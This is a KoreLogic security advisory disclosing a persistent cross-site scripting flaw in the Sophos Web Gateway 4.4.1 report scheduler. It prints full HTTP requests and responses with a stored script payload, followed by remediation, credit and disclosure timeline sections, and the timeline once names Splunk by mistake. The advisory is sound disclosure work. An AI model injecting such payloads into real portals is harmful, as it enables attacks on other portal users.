Sophos Web Gateway 4.4.1 Cross Site Scripting

Sophos Web Gateway version 4.4.1 suffers from a persistent cross site scripting vulnerability.


MD5 | 45f65498ed379818369f240076c5d2c3

KL-001-2018-001 : Sophos Web Gateway Persistent Cross Site Scripting Vulnerability

Title: Sophos Web Gateway Persistent Cross Site Scripting Vulnerability
Advisory ID: KL-001-2018-001
Publication Date: 2018.01.26
Publication URL: https://www.korelogic.com/Resources/Advisories/KL-001-2018-001.txt


1. Vulnerability Details

Affected Vendor: Sophos
Affected Product: Web Gateway
Affected Version: 4.4.1
Platform: Embedded Linux
CWE Classification: CWE-79: Improper Neutralization of Input During Web
Page Generation, CWE-80: Improper Neutralization of
Script-Related HTML Tags in a Web Page
Impact: Arbitrary Code Execution
Attack vector: HTTP

2. Vulnerability Description

The report scheduler menu within the management portal
contains a persistent cross site scripting vulnerability. This
vulnerability can be used to target other users of the same
portal.

3. Technical Description

A valid session is required to create the report with the
persistent cross site scripting payload attached. An example
attack payload has been included below. This payload is designed
to trigger an alert box with the number one being displayed.

POST /index.php?c=report_scheduler HTTP/1.1
Host: 1.3.3.7
Accept-Language: en-US,en;q=0.5
X-Requested-With: XMLHttpRequest
X-Prototype-Version: 1.6.1
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Content-Length: 1190
DNT: 1
Connection: close


action=save&STYLE=016a16896568739c11955632068abddd&data=%5b%7b%22%53%54%59%4c%45%22%3a%20%22%30%31%36%61%31%36%38%39%36%35%36%38%37%33%39%63%31%31%39%35%35%36%33%32%30%36%38%61%62%64%64%64%22%2c%20%22%63%62%5f%74%72%61%66%5f%70%65%72%66%22%3a%20%22%79%65%73%22%2c%20%22%73%62%5f%64%65%74%61%69%6c%65%64%5f%70%6f%6c%69%63%79%5f%63%6f%75%6e%74%22%3a%20%22%31%22%2c%20%22%73%62%5f%67%72%6f%75%70%73%22%3a%20%22%73%6f%70%68%6f%73%5f%73%77%61%5f%61%6c%6c%5f%64%65%70%61%72%74%6d%65%6e%74%73%22%2c%20%22%72%64%5f%73%63%68%65%64%75%6c%65%22%3a%20%22%64%61%69%6c%79%22%2c%20%22%73%62%5f%64%61%79%73%22%3a%20%22%37%22%2c%20%22%73%62%5f%77%65%65%6b%6c%79%5f%64%61%79%22%3a%20%22%4d%6f%6e%64%61%79%22%2c%20%22%74%78%74%5f%73%63%68%65%64%75%6c%65%5f%6e%61%6d%65%22%3a%20%22%74%65%73%74%3c%73%63%72%69%70%74%3e%61%6c%65%72%74%28%31%29%3b%3c%2f%73%63%72%69%70%74%3e%22%2c%20%22%63%62%5f%61%63%74%69%76%61%74%65%5f%73%63%68%65%64%75%6c%65%22%3a%20%22%79%65%73%22%2c%20%22%72%65%63%69%70%69%65%6e%74%73%22%3a%20%22%74%65%73%74%40%74%65%73%74%2e%61%73%64%61%73%64%22%2c%20%22%73%63%68%65%64%75%6c%65%5f%69%64%22%3a%20%22%64%47%56%7a%64%41%3d%3d%22%2c%20%22%6f%77%6e%65%72%22%3a%20%22%61%64%6d%69%6e%22%7d%5d


HTTP/1.1 200 OK
Date: Sat, 29 Jul 2017 16:05:25 GMT
Server: Apache
Cache-Control: no-store, no-cache, must-revalidate, private, post-check=0, pre-check=0
Pragma: no-cache
X-Frame-Options: sameorigin
X-Content-Type-Options: nosniff
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 41

{"status":0,"statusMsg":"Settings saved"}


The URL-encoded input being passed in input parameter can be
decoded to a array containing a single JSON buffer.


[{"STYLE": "016a16896568739c11955632068abddd", "cb_traf_perf": "yes", "sb_detailed_policy_count": "1",
"sb_groups": "sophos_swa_all_departments", "rd_schedule": "daily", "sb_days": "7", "sb_weekly_day": "Monday",
"txt_schedule_name": "test<script>alert(1);</script>", "cb_activate_schedule": "yes", "recipients": "[email protected]",
"schedule_id": "dGVzdA==", "owner": "admin"}]


Within the JSON buffer is a key called txt_schedule_name. The
value for this key is the name of the scheduled report. This
value is included in the report schedule list.


"txt_schedule_name": "test<script>alert(1);</script>"

The HTML tags are then stored. When the report schedule is
viewed, the resulting JSON is sent as content-type text/html
instead of application/json, causing the browser to execute any
unescaped javascript it contains. The output is HTML-encoded
with the exception of the txt_schedule_name: value which is
not sanitized, and the payload triggers.


POST /index.php?c=report_scheduler HTTP/1.1
Host: 1.3.3.7
Accept: text/javascript, text/html, application/xml, text/xml, */*
Accept-Language: en-US,en;q=0.5
X-Requested-With: XMLHttpRequest
X-Prototype-Version: 1.6.1
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Content-Length: 81
DNT: 1
Connection: close

action=load&sortKey=name&sortDirection=asc&STYLE=016a16896568739c11955632068abddd


HTTP/1.1 200 OK
Date: Sat, 29 Jul 2017 16:06:38 GMT
Server: Apache
Cache-Control: no-store, no-cache, must-revalidate, private, post-check=0, pre-check=0
Pragma: no-cache
X-Frame-Options: sameorigin
X-Content-Type-Options: nosniff
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 1365


{"sortKey":"name","sortDirection":"asc","schedulesJS":[{"STYLE":"016a16896568739c11955632068abddd","cb_traf_perf":"yes","sb_detailed_policy_count":"1","sb_groups":"sophos_swa_all_departments","rd_schedule":"daily","sb_days":"7","sb_weekly_day":"Monday","txt_schedule_name":"test<script>alert(1);<\/script>","cb_activate_schedule":"yes","recipients":"[email protected]","schedule_id":"dGVzdA==","owner":"admin"}],"schedulesList":"<ul
id=\"table_entries_list\"><li class=\"body schedule-row \" id=\"li_test<script>alert(1);<\/script>\"><div
class=\"schedulename\"><a href=\"?STYLE=016a16896568739c11955632068abddd#\"
title=\"test<script>alert(1);<\/script>\">test<script>alert(1);<\/script><\/a><\/div><div
class=\"owner\" title=\"admin\">admin<\/div><div class=\"schedule_time\" title=\"Daily\">Daily<\/div><div
title=\"Active\" class=\"schedule-active-on\"><\/div><div class=\"action\"><a
href=\"?STYLE=016a16896568739c11955632068abddd#\" id=\"on_off_test<script>alert(1);<\/script>\"
name=\"on_off_test<script>alert(1);<\/script>\" class=\"button small\"><span class=\"buttonLabel small\"
id=\"on_off_span_test<script>alert(1);<\/script>\">Turn Off<\/span><\/a><\/div><div class=\"delete\"><input
type=\"checkbox\" id=\"chk_test<script>alert(1);<\/script>\"\/><\/div><\/li><\/ul>"}

4. Mitigation and Remediation Recommendation

The vendor has released version 4.3.3.1 of the Web Gateway
which addesses this issue. Release notes available at:

http://wsa.sophos.com/rn/swa/concepts/ReleaseNotes_4.3.3.1.html

5. Credit

This vulnerability was discovered by Matt Bergin (@thatguylevel)
of KoreLogic, Inc.

6. Disclosure Timeline

2017.08.17 - KoreLogic submits vulnerability details to Sophos.
2017.08.17 - Sophos confirms receipt.
2017.09.29 - 30 business days have elapsed since the vulnerability
was reported to Sophos.
2017.10.17 - KoreLogic requests an update from Sophos.
2017.10.19 - Sophos informs KoreLogic that they will issue a fix in
the next maintenance release, scheduled for the end of
November. Sophos asks KoreLogic to hold disclosure until
the new version is released.
2017.10.23 - 45 business days have elapsed since the vulnerability
was reported to Splunk.
2017.11.02 - Sophos notifies KoreLogic that the maintenance release
has gone live.
2018.01.26 - KoreLogic public disclosure.

7. Proof of Concept

See 3. Technical Description.


The contents of this advisory are copyright(c) 2018
KoreLogic, Inc. and are licensed under a Creative Commons
Attribution Share-Alike 4.0 (United States) License:
http://creativecommons.org/licenses/by-sa/4.0/

KoreLogic, Inc. is a founder-owned and operated company with a
proven track record of providing security services to entities
ranging from Fortune 500 to small and mid-sized companies. We
are a highly skilled team of senior security consultants doing
by-hand security assessments for the most important networks in
the U.S. and around the world. We are also developers of various
tools and resources aimed at helping the security community.
https://www.korelogic.com/about-korelogic.html

Our public vulnerability disclosure policy is available at:
https://www.korelogic.com/KoreLogic-Public-Vulnerability-Disclosure-Policy.v2.2.txt


Related Posts